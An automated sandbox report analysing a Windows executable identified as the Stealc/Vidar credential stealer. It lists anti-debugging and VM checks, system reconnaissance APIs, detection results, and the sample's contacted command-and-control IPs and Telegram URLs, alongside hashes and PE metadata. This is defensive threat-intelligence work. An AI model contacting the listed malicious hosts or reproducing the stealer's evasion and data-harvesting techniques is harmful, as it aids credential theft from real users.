Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_00744910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00744910
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0073BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0073BE70
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0073DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0073DE10
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_007316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_007316D0
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0073F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0073F6B0
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_00743EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_00743EA0
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0073DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0073DA80

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: 0_2_00731160 GetSystemInfo,ExitProcess,

0_2_00731160

Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.000000000102F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	API call chain: ExitProcess graph end node	graph_0-12401
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	API call chain: ExitProcess graph end node	graph_0-12404
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	API call chain: ExitProcess graph end node	graph_0-12423
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	API call chain: ExitProcess graph end node	graph_0-12415
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	API call chain: ExitProcess graph end node	graph_0-12444
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	API call chain: ExitProcess graph end node	graph_0-12243

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: 0_2_0074AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0074AD48

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: 0_2_007345C0 VirtualProtect ?,00000004,00000100,00000000

0_2_007345C0

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

0_2_00749860

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: 0_2_00749750 mov eax, dword ptr fs:[00000030h]

0_2_00749750

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: 0_2_00747850 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_00747850

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0074AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0074AD48
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0074CEEA SetUnhandledExceptionFilter,	0_2_0074CEEA
Source: C:\Users\user\Desktop\BnxBRWQWhy.exe	Code function: 0_2_0074B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0074B33A

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: BnxBRWQWhy.exe, type: SAMPLE
Source: Yara match	File source: Process Memory Space: BnxBRWQWhy.exe PID: 6936, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: 0_2_00749600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00749600

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00747B90

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: 0_2_00746920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00746920

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: 0_2_00747850 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_00747850

Source: C:\Users\user\Desktop\BnxBRWQWhy.exe

Code function: 0_2_00747A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_00747A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: BnxBRWQWhy.exe, type: SAMPLE
Source: Yara match	File source: 0.0.BnxBRWQWhy.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BnxBRWQWhy.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2106325851.0000000000731000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BnxBRWQWhy.exe PID: 6936, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: BnxBRWQWhy.exe PID: 6936, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: BnxBRWQWhy.exe, type: SAMPLE
Source: Yara match	File source: 0.0.BnxBRWQWhy.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BnxBRWQWhy.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2106325851.0000000000731000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BnxBRWQWhy.exe PID: 6936, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: BnxBRWQWhy.exe PID: 6936, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	Data from Local System	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Process Injection	NTDS	11 Process Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	123 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
BnxBRWQWhy.exe	50%	ReversingLabs	Win32.Trojan.Generic
BnxBRWQWhy.exe	100%	Avira	TR/Crypt.XPACK.Gen7
BnxBRWQWhy.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
t.me	149.154.167.99	true	true		unknown

Contacted URLs

Name	Malicious	Reputation
http://91.214.78.145/	false	unknown
https://t.me/hwlflcqshvwp	true	unknown
http://193.233.112.44/383ccd496f3c5eee.php	true	unknown
http://193.233.112.44/	true	unknown
https://t.me/hwlflcqshvwp/383ccd496f3c5eee.php	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://91.214.78.145	BnxBRWQWhy.exe, 00000000.00000003.2128523908.0000000001035000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://t.me/	BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001006000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	BnxBRWQWhy.exe	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0	BnxBRWQWhy.exe	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	BnxBRWQWhy.exe	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	BnxBRWQWhy.exe	false	URL Reputation: safe	unknown
https://web.telegram.org	BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001081000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.000000000102F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://193.233.112.44	BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001024000.00000004.00000020.00020000.00000000.sdmp, BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://193.233.112.44/W	BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://193.233.112.44/383ccd496f3c5eee.php_lw	BnxBRWQWhy.exe, 00000000.00000002.2158782310.000000000103C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	BnxBRWQWhy.exe	false	URL Reputation: safe	unknown
http://91.214.78.145/5	BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://91.214.78.145/x	BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://193.233.112.44/j	BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000001063000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://193.233.112.44Rn	BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://t.me/hwlflcqshvwps	BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://193.233.112.44/tion:	BnxBRWQWhy.exe, 00000000.00000002.2158782310.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	BnxBRWQWhy.exe	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.214.78.145	unknown	Russian Federation	49373	FOTONTELECOM-STUB-ASFOTONTELECOMRU	false
193.233.112.44	unknown	Russian Federation	20549	FREE-MPEIRU	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1525312
Start date and time:	2024-10-04 00:56:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BnxBRWQWhy.exe renamed because original name is a hash value
Original Sample Name:	ea6989e3a607d753377b05bae55140d8.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@1/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 20 Number of non-executed functions: 84
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: BnxBRWQWhy.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.214.78.145	NJna3TEAEr.exe	Get hash	malicious	Stealc, Vidar	Browse	91.214.78.145/
193.233.112.44	NJna3TEAEr.exe	Get hash	malicious	Stealc, Vidar	Browse	193.233.112.44/383ccd496f3c5eee.php
149.154.167.99	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	NJna3TEAEr.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	gp4uQBDTP8.exe	Get hash	malicious	Xehook Stealer	Browse	149.154.167.99
	dNNMgwxY4f.exe	Get hash	malicious	Xehook Stealer	Browse	149.154.167.99
	tcU5sAPsAc.exe	Get hash	malicious	RedLine	Browse	149.154.167.99
	https://thebrasilians.hosted.phplist.com/lists/lt.php?tid=KkkFBgMBXQUHUEsCB1QHTwZWAFYbCQpVBx0EBQABCgADAgJXVl1FVAIAUVFdUVhPBgUCVBsEA1JVHQ8BW1cUUAQGV1cBAF1aUgNQHVAHBFEFBgVRGwEAVQEdAlcLUBQKBAEDHlMAAVILAVBQBwUDBA	Get hash	malicious	Unknown	Browse	50.6.153.166
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	https://linke.to/pkmlogistics	Get hash	malicious	Unknown	Browse	162.159.153.4
	https://form.asana.com/?k=SVzOAgf254NWBNm-dO6Wfg&d=1208255323046871	Get hash	malicious	Unknown	Browse	50.6.153.2

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	NJna3TEAEr.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	enigma.tech.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	1.cmd	Get hash	malicious	Unknown	Browse	149.154.167.220
	2.cmd	Get hash	malicious	Unknown	Browse	149.154.167.220
	gp4uQBDTP8.exe	Get hash	malicious	Xehook Stealer	Browse	149.154.167.99
	dNNMgwxY4f.exe	Get hash	malicious	Xehook Stealer	Browse	149.154.167.99
	KBGC_1200O000000_98756.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	08(2)_00.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
FOTONTELECOM-STUB-ASFOTONTELECOMRU	NJna3TEAEr.exe	Get hash	malicious	Stealc, Vidar	Browse	91.214.78.145
	kQ6mFXrgYq.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	91.214.78.75
	PQmAnagsLM.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	91.214.78.75
	z10Original-Copy.bat.exe	Get hash	malicious	Remcos	Browse	91.214.78.17
FREE-MPEIRU	NJna3TEAEr.exe	Get hash	malicious	Stealc, Vidar	Browse	193.233.112.44
	file.exe	Get hash	malicious	Stealc	Browse	193.233.113.184
	file.exe	Get hash	malicious	Stealc	Browse	193.233.113.184
	file.exe	Get hash	malicious	Stealc	Browse	193.233.113.184
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	193.233.113.184
	SecuriteInfo.com.Trojan.Crypt.23519.13317.exe	Get hash	malicious	Unknown	Browse	193.233.121.52
	file.exe	Get hash	malicious	DCRat	Browse	193.233.115.185
	BitTorrent-7.6.exe	Get hash	malicious	Unknown	Browse	193.233.122.71
	https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38	Get hash	malicious	Unknown	Browse	193.233.84.115
	https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38	Get hash	malicious	Phisher	Browse	193.233.84.115

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	NJna3TEAEr.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	rpedido-002297.exe	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.99
	app__v7.5.3_.msi	Get hash	malicious	Unknown	Browse	149.154.167.99
	WarzoneCheat.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	149.154.167.99
	FACTURA-002297.exe	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	Layer.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	Layer.exe	Get hash	malicious	Unknown	Browse	149.154.167.99

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.408555467669457
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	BnxBRWQWhy.exe
File size:	336'040 bytes
MD5:	ea6989e3a607d753377b05bae55140d8
SHA1:	5c67ca11e96875c9beb0d320170e000698a65148
SHA256:	9e857e6656ff0d6da789faa05f9fb49c323bdcea03b0b7887bbac919122f32fb
SHA512:	80b021d768456c797e8ff1e44f6e1c4699705917cb4b735d1286e470251c279cf4273fc0ff8360e77142bdec02e5213aa251a0cedfbb1bc315810ea89f32e1c2
SSDEEP:	6144:gihi8LYtUokCulxMfpbLve/NlHWTAFQnE7w+Uw3NKR9hU/W93+z27:/UtUoH3RvA6EFO4wx8KRF93+i7
TLSH:	42646C32F65018BDE4A2457C95DE5F299BB978320310CEDB53D00A851FE22F5ED39A2B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...3..f...........

File Icon


Icon Hash:	2f232d67b7934633

Static PE Info

General

Entrypoint:	0x4169f0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66FE8833 [Thu Oct 3 12:04:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	8e9e6de8c6aa184371108e1074479bb3

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	16/01/2023 01:00:00 16/01/2026 00:59:59
Subject Chain	CN=Avast Software s.r.o., O=Avast Software s.r.o., L=Praha, C=CZ
Version:	3
Thumbprint MD5:	88F0356B1045C86B3BE429E369E41C0B
Thumbprint SHA-1:	22C7A21648690E1B610F1E964AFB3044EAE24335
Thumbprint SHA-256:	8C5E3683E3D73A2E9C9452FC91757931A5333EAE9670BAF00874D3C8D6D6A52A
Serial:	015A6BEC4D7F549FE525C852DF670E13

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 4Ch
call 00007FB404BD07EAh
call 00007FB404BE7DE5h
push 00420AEFh
lea ecx, dword ptr [ebp-0Ch]
call 00007FB404BE8CB8h
call 00007FB404BCF743h
call 00007FB404BCF6CEh
call 00007FB404BCF679h
call 00007FB404BCF784h
call 00007FB404BE4CCFh
call 00007FB404BCF6EAh
call 00007FB404BE5DA5h
push eax
lea eax, dword ptr [ebp-4Ch]
push eax
push 00421110h
lea ecx, dword ptr [ebp-40h]
push ecx
call 00007FB404BE5E22h
push eax
lea edx, dword ptr [ebp-34h]
push edx
push 0042110Ch
lea eax, dword ptr [ebp-28h]
push eax
mov ecx, dword ptr [0064A540h]
push ecx
lea edx, dword ptr [ebp-1Ch]
push edx
lea ecx, dword ptr [ebp-0Ch]
call 00007FB404BE8ED1h
mov ecx, eax
call 00007FB404BE8ECAh
mov ecx, eax
call 00007FB404BE8EC3h
mov ecx, eax
call 00007FB404BE8EBCh
mov ecx, eax
call 00007FB404BE8EB5h
push eax
lea ecx, dword ptr [ebp-0Ch]
call 00007FB404BE8D9Ch
lea ecx, dword ptr [ebp-4Ch]
call 00007FB404BE8CF4h
lea ecx, dword ptr [ebp-40h]
call 00007FB404BE8CECh
lea ecx, dword ptr [ebp-34h]
call 00007FB404BE8CE4h
lea ecx, dword ptr [ebp-28h]
call 00007FB404BE8CDCh
lea ecx, dword ptr [ebp-1Ch]
call 00007FB404BE8CD4h
mov eax, 00000001h
test eax, eax

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2aa88	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x261000	0x292a	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x4f600	0x2aa8	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25c000	0x24e0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1e000	0x104	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1cc8f	0x1ce00	772877cbef91323cce1e5e6fd7751dfb	False	0.468259604978355	Matlab v4 mat-file (little endian) \352\316A, numeric, rows 4316256, columns 0	6.091301719361258	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x1e000	0xcfec	0xd000	b2323904f62b167dba799c7c680521a5	False	0.5270244891826923	data	6.652181615943377	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2b000	0x2303a4	0x1e400	47130f1bd451e62a6f3377958ec20b2f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x25c000	0x459e	0x4600	8ab3c7ccd47f8b4178413c498003e08e	False	0.4401227678571429	data	4.493567457805053	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x261000	0x292a	0x2a00	5f69202e3e076ee40a63c6506aad42d5	False	0.34337797619047616	data	4.70793889785315	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x2611a0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0, 16 important colors	0.6216216216216216
